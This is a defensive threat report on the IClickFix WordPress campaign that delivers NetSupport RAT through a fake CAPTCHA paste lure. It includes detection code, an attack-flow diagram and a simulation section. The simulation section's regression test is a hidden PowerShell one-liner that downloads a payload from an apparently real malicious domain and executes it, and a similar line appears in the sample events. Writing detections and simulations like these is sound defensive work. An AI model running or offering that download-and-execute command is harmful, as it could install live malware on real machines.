SOC Prime Bias: Medium

03 Feb 2026 21:25

Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report profiles IClickFix, a malicious JavaScript framework that compromises WordPress sites and presents a spoofed Cloudflare Turnstile-style CAPTCHA. The lure coerces visitors into executing a PowerShell command that downloads and installs NetSupport RAT. Delivery is supported by a traffic distribution system built around the YOURLS URL shortener and a rotating set of redirector domains. Researchers observed more than 3,800 compromised WordPress sites serving this chain globally since late 2024.

Investigation

Sekoia analysts identified the injected JavaScript tag ic-tracker-js on compromised sites, then reconstructed the redirect flow across multiple short-lived domains. They captured the exact PowerShell execution pattern used to retrieve the final payload and recovered the dropped NetSupport RAT components along with associated C2 infrastructure indicators.

Mitigation

Monitor web content for the ic-tracker-js injection and block known malicious domains, redirectors, and short-link services used in the chain. On endpoints, detect PowerShell download-and-execute patterns consistent with the ClickFix lure. Add coverage for NetSupport client file creation and for persistence via user-level Run registry keys.
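The following script is an added example (not SOC Prime's Sigma content and not Sekoia's code) that turns the mitigation points above into runnable detection logic: the hidden-window PowerShell download-and-execute pattern, NetSupport client file creation under ProgramData, a user-level Run key pointing at that drop location, and the web-side ic-tracker-js injection check. It runs over constructed, simplified Sysmon-style event dicts rather than real logs; the domain redirector.example.invalid, the user name, the SID and the Temp path are constructed placeholders, and the web check assumes the injected script markup contains the literal string ic-tracker-js (the report names the tag but not the attribute it appears in).

```python
"""Detection logic for the IClickFix -> NetSupport RAT chain (added example).

Telemetry is modelled as a list of simplified, constructed Sysmon-style event
dicts (process creation, file creation, registry value set), not real logs.
"""
import re

# Behavioural indicators for the PowerShell stage; none is tied to one domain.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
NO_PROFILE = re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b")
DOWNLOAD_CMDLET = re.compile(r"(?i)\b(?:iwr|invoke-webrequest)\b")
EXEC_CMDLET = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
# Strings taken from the report's observed command line (page IoCs).
KNOWN_IOC_STRINGS = ("tytuy.json",)
# User-hive Run key: HKCU\... or HKU\<SID>\...
USER_RUN_KEY = re.compile(
    r"(?i)^HK(?:CU|U\\[^\\]+)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
)


def classify_powershell(cmdline: str) -> list[str]:
    """Return the ClickFix-style indicators present in a command line.

    The chain runs PowerShell with a hidden window and no profile, fetches a
    script with Invoke-WebRequest and runs it with Invoke-Expression. A match
    requires download + execute plus at least one evasion switch; known page
    strings only add confidence, so a renamed payload is still caught.
    """
    hits = []
    if HIDDEN_WINDOW.search(cmdline):
        hits.append("hidden_window")
    if NO_PROFILE.search(cmdline):
        hits.append("no_profile")
    if DOWNLOAD_CMDLET.search(cmdline):
        hits.append("download")
    if EXEC_CMDLET.search(cmdline):
        hits.append("invoke_expression")
    for ioc in KNOWN_IOC_STRINGS:
        if ioc.lower() in cmdline.lower():
            hits.append(f"ioc:{ioc}")
    evasion = {"hidden_window", "no_profile"} & set(hits)
    if "download" in hits and "invoke_expression" in hits and evasion:
        return hits
    return []  # individual switches alone are too noisy to alert on


def is_netsupport_drop(path: str) -> bool:
    """NetSupport client written under ProgramData (report: ProgramData\\S1kCMNfZi3\\client32.exe)."""
    p = path.lower()
    return p.endswith("\\client32.exe") and "\\programdata\\" in p


def is_user_run_persistence(key: str, data: str) -> bool:
    """User-level Run value whose target lives under ProgramData.

    Heuristic: per-user autostarts normally point into Program Files or the
    user's own profile, so a Run value aimed at ProgramData deserves a look.
    """
    return bool(USER_RUN_KEY.match(key)) and "\\programdata\\" in data.lower()


def find_ic_tracker_injection(html: str) -> list[int]:
    """Web-side check: 1-based line numbers whose markup contains the ic-tracker-js marker."""
    return [i for i, line in enumerate(html.splitlines(), 1) if "ic-tracker-js" in line]


def triage(events: list[dict]) -> list[tuple[int, str]]:
    """Run every endpoint check over the events; return (event index, reason) pairs."""
    findings = []
    for i, ev in enumerate(events):
        if ev["type"] == "process_create":
            hits = classify_powershell(ev["cmdline"])
            if hits:
                findings.append((i, "clickfix_powershell:" + ",".join(hits)))
        elif ev["type"] == "file_create" and is_netsupport_drop(ev["target"]):
            findings.append((i, "netsupport_client_drop"))
        elif ev["type"] == "registry_set" and is_user_run_persistence(ev["key"], ev["data"]):
            findings.append((i, "user_run_key_persistence"))
    return findings


# Constructed sample telemetry (not real logs). The malicious entries mirror the
# report's chain; the benign ones show that the checks stay quiet on normal activity.
TEMP = r"C:\Users\alice\AppData\Local\Temp"  # constructed path
SAMPLE_EVENTS = [
    {"type": "process_create",
     "cmdline": f"powershell -w hidden -nop -c \"iwr 'https://redirector.example.invalid/tytuy.json' "
                f"-OutFile {TEMP}\\payload.ps1; iex (Get-Content {TEMP}\\payload.ps1 -Raw)\""},
    {"type": "process_create",
     "cmdline": "powershell -NoProfile -Command Get-ChildItem C:\\logs"},
    {"type": "file_create", "target": r"C:\ProgramData\S1kCMNfZi3\client32.exe"},
    {"type": "file_create", "target": r"C:\Program Files\Vendor\app.exe"},
    {"type": "registry_set",  # constructed SID
     "key": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"C:\ProgramData\S1kCMNfZi3\client32.exe"},
    {"type": "registry_set",
     "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "data": r"C:\Windows\System32\SecurityHealthSystray.exe"},
]

if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

Running it reports three findings (the hidden download-and-execute command line, the client32.exe drop and the user-hive Run value) and nothing for the benign events. The process check deliberately keys on behaviour rather than on the download domain, since the report describes a rotating set of redirector domains; the page strings are kept only as an extra confidence tag.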

Response

When indicators surface, isolate the endpoint, stop the active PowerShell process, and remove NetSupport binaries plus any registry-based persistence. Follow with full forensic triage to confirm the attacker did not deploy additional implants or establish secondary access paths.

Attack Flow

    graph TB
      %% Class Definitions
      classDef action fill:#99ccff
      classDef tool fill:#ffcc99
      classDef malware fill:#ff9999
      classDef file fill:#cccccc

      %% Action Nodes
      action_initial_access["<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Compromise WordPress sites by exploiting core or popular plugin vulnerabilities (Elementor, WooCommerce, Gravity Forms)."]
      class action_initial_access action
      action_content_injection["<b>Action</b> – <b>T1659 Content Injection</b><br/>Inject malicious JavaScript containing the tag <i>ic-tracker-js</i> into compromised pages to load attacker-controlled scripts."]
      class action_content_injection action
      action_software_extensions["<b>Action</b> – <b>T1176 Software Extensions</b><br/>Leverage vulnerable WordPress plugins as extensions to persist the malicious code on the site."]
      class action_software_extensions action
      action_dynamic_resolution["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>Use YOURLS shortener and a chain of domains (e.g., ksfldfklskdmbxcvb.com) to resolve and deliver payloads while filtering bots."]
      class action_dynamic_resolution action
      action_obfuscated_payloads["<b>Action</b> – <b>T1027 Obfuscated/Stored Files</b><br/>Encode first-stage JavaScript and PowerShell loader with Base64 and slice strings to evade detection."]
      class action_obfuscated_payloads action
      action_user_execution["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victims click the compromised WordPress URL, triggering the redirect chain."]
      class action_user_execution action
      action_input_injection["<b>Action</b> – <b>T1674 Input Injection & T1204.004 Malicious Copy-Paste</b><br/>JavaScript writes a PowerShell command to the clipboard and displays a fake Cloudflare Turnstile CAPTCHA lure."]
      class action_input_injection action
      action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Hidden PowerShell command executes, downloads second-stage script <i>tytuy.json</i>, and drops NetSupport RAT."]
      class action_powershell action
      action_persistence["<b>Action</b> – <b>T1547.014 Boot or Logon Autostart Execution: Active Setup</b><br/>Create Run registry key pointing to <i>client32.exe</i> in ProgramData\S1kCMNfZi3, ensuring execution at startup."]
      class action_persistence action
      action_c2["<b>Action</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/>NetSupport RAT communicates over HTTPS to attacker-controlled domains (e.g., nightlomsknies.com/fakeurl.htm)."]
      class action_c2 action
      action_data_obfuscation["<b>Action</b> – <b>T1001 Data Obfuscation</b><br/>Obfuscate C2 traffic and payloads to hide malicious activity."]
      class action_data_obfuscation action

      %% Tool / Malware / File Nodes
      tool_wordpress_core["<b>Tool</b> – <b>Name</b>: WordPress Core<br/><b>Vulnerability</b>: Remote code execution"]
      class tool_wordpress_core tool
      tool_elementor_plugin["<b>Tool</b> – <b>Name</b>: Elementor Plugin<br/><b>Vulnerability</b>: CVE-specific RCE"]
      class tool_elementor_plugin tool
      tool_yourls["<b>Tool</b> – <b>Name</b>: YOURLS Shortener<br/><b>Purpose</b>: URL redirection and dynamic resolution"]
      class tool_yourls tool
      malware_netsupport["<b>Malware</b> – <b>Name</b>: NetSupport RAT<br/><b>Capability</b>: Remote control and data exfiltration"]
      class malware_netsupport malware
      file_client32["<b>File</b> – <b>Name</b>: client32.exe<br/><b>Location</b>: ProgramData\S1kCMNfZi3"]
      class file_client32 file
      file_tyuy_json["<b>File</b> – <b>Name</b>: tytuy.json<br/><b>Purpose</b>: Second-stage PowerShell script"]
      class file_tyuy_json file

      %% Connections
      action_initial_access -->|exploits| tool_wordpress_core
      tool_wordpress_core -->|provides entry| action_content_injection
      action_content_injection -->|injects script using| tool_elementor_plugin
      action_content_injection -->|leads to| action_software_extensions
      action_software_extensions -->|persists via| tool_elementor_plugin
      action_software_extensions -->|enables| action_dynamic_resolution
      action_dynamic_resolution -->|utilizes| tool_yourls
      action_dynamic_resolution -->|delivers| action_obfuscated_payloads
      action_obfuscated_payloads -->|produces| action_user_execution
      action_user_execution -->|triggers| action_input_injection
      action_input_injection -->|writes clipboard command| action_powershell
      action_powershell -->|downloads| file_tyuy_json
      file_tyuy_json -->|drops| malware_netsupport
      malware_netsupport -->|installs| action_persistence
      action_persistence -->|creates| file_client32
      file_client32 -->|executed at startup| action_c2
      malware_netsupport -->|communicates with| action_c2
      action_c2 -->|uses| action_data_obfuscation

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

  • Attack Narrative & Commands:

    An adversary who has initial access to the endpoint wishes to establish a persistent foothold by delivering the NetSupport RAT. To evade interactive detection, they launch PowerShell in hidden mode with no profile or logo (-w hidden -nop -c). They then use Invoke-WebRequest (iwr) to download a malicious JSON payload (tytuy.json) that contains a PowerShell script for the RAT. The script is written to the temporary directory and executed via Invoke-Expression. This exact command line matches the strings the Sigma rule monitors.

  • Regression Test Script:

    # PowerShell one-liner that matches the detection rule
    $url = 'https://scottvmorton.com/tytuy.json'
    $out = "$env:TEMP\payload.ps1"   # written to the user's temporary directory

    powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"

  • Cleanup Commands:

    # Remove the downloaded payload, the dropped NetSupport folder and any lingering PowerShell processes;
    # Get-Process exposes CommandLine only on PowerShell 7+, so the command line is matched via Win32_Process
    Remove-Item -Path "$env:TEMP\payload.ps1" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:ProgramData\S1kCMNfZi3" -Recurse -Force -ErrorAction SilentlyContinue
    Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
        Where-Object { $_.CommandLine -match 'tytuy\.json' } |
        ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }